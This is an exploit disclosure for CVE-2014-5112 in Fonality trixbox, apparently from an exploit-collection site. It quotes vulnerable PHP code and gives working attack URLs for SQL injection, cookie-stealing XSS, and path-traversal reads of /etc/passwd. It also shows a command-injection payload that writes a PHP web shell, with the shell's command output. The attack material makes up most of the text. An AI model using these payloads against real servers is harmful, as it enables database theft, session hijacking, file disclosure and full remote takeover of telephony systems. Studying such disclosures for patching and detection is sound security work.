Headline
CVE-2014-5112: Trixbox XSS / LFI / SQL Injection
maint/modules/home/index.php in Fonality trixbox allows remote attackers to execute arbitrary commands via shell metacharacters in the lang parameter.
Trixbox All Version - Multiple Vulnerabilties =================================================================== #################################################################### .:. Author : AtT4CKxT3rR0r1ST .:. Contact : [[email protected]] , [[email protected]] .:. Home : http://www.iphobos.com/blog/ .:. Script : http://www.trixbox.com/ #################################################################### [1] Sql Injection =================== VULNERABILITY ############## [I] /var/www/html/maint/modules/endpointcfg/endpoint_generic.php Line 79-99: case 'Submit': $message = ""; $phone_vars['mac_address'] = cleanMAC($phone_vars['mac_address']); if(!preg_match('/^[0-9A-F]{12}$/i', $phone_vars['mac_address'])) {$message = "MAC is invalid";} if ($phone_vars['freepbx_device']!="NONE") { //get list of devices from FreePBX $phone_vars = PopulateFromFreepbx($phone_vars); } else { $phone_vars['phone_label'] = $MACTABLE[substr($phone_vars['mac_address'],0,6)]['vendor']; } if ($_REQUEST['mac']){ // if there is an ID then edit an existing phone $querytxt = "UPDATE Generic SET "; foreach ($phone_vars as $key => $value) { $querytxt .= $key. " = '" .trim($value). "',"; } $querytxt .= "EditDate = NOW() WHERE mac_address='" . $_REQUEST['mac']."'"; $error = getSQL($querytxt,'endpoints'); } ######### EXPLOIT ######### Http://IP/maint/modules/endpointcfg/endpoint_generic.php?action=Submit&mac=1' and 1=2 union select 1,2,3,4,5,6-- - [2] Cross Site Scripting =========================== VULNERABILITY ############## [I] /var/www/html/user/help/html/index.php Line 44: $smarty->assign("id_nodo", $_GET['id_nodo']); ######### EXPLOIT ######### Http://IP/user/help/html/index.php?id_nodo=" onmouseover%3dprompt(document.cookie) bad%3d" [3] Multiple Local File Include ================================= VULNERABILITY ############## [I] /var/www/html/maint/modules/home/index.php Line 68-72: $tbLang = $_GET['lang']; $languageFile = 'language/'.$tbLang.'.php'; if(file_exists($languageFile)){ include($languageFile); } ######### EXPLOIT ######### Http://IP/maint/modules/home/index.php?lang=../../../../../../../../etc/passwd%00 VULNERABILITY ############## [II] /var/www/html/maint/modules/asterisk_info/asterisk_info.php Line 17-25: if(!empty($_GET['lang']) && isset($_GET['lang'])){ $tbLang = $_GET['lang']; }else{ $tbLang = 'english'; } $languageFile = 'language/'.$tbLang.'.php'; if(file_exists($languageFile)){ include($languageFile); } ######### EXPLOIT ######### Http://IP/maint/modules/asterisk_info/asterisk_info.php?lang=../../../../../../../../etc/passwd%00 VULNERABILITY ############## [III] /var/www/html/maint/modules/repo/repo.php Line 9-13: $tbLang = $_GET['lang']; $languageFile = 'language/'.$tbLang.'.php'; if(file_exists($languageFile)){ include($languageFile); } ######### EXPLOIT ######### Http://IP/maint/modules/repo/repo.php?lang=../../../../../../../../etc/passwd%00 VULNERABILITY ############## [V] /var/www/html/maint/modules/endpointcfg/endpointcfg.php Line 29-33: if(!empty($_GET['lang']) && isset($_GET['lang'])){ $languageFile = includeLanguage($_GET['lang']); include($languageFile); $tbLang = $_GET['lang']; }else{ ######### EXPLOIT ######### Http://IP/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00 [4] Remote Code Execution =========================== VULNERABILITY ############## [I] /var/www/html/maint/modules/home/index.php Line 339: $phpOutput = shell_exec('php -q libs/status.php '.$tbLang);//exec('perl libs/status.pl'); Line 68: $tbLang = $_GET['lang']; ######### EXPLOIT ######### Http://IP/maint/modules/home/index.php?lang=MF;echo "<?php system(\$_GET['cmd']);?> \$Greats 2 MY=\"Love:D">shell.php Your Shell Http://IP/maint/modules/home/shell.php?cmd=id uid=100(asterisk) gid=101(asterisk) groups=101(asterisk) $Greats 2 MY="Love:D ####################################################################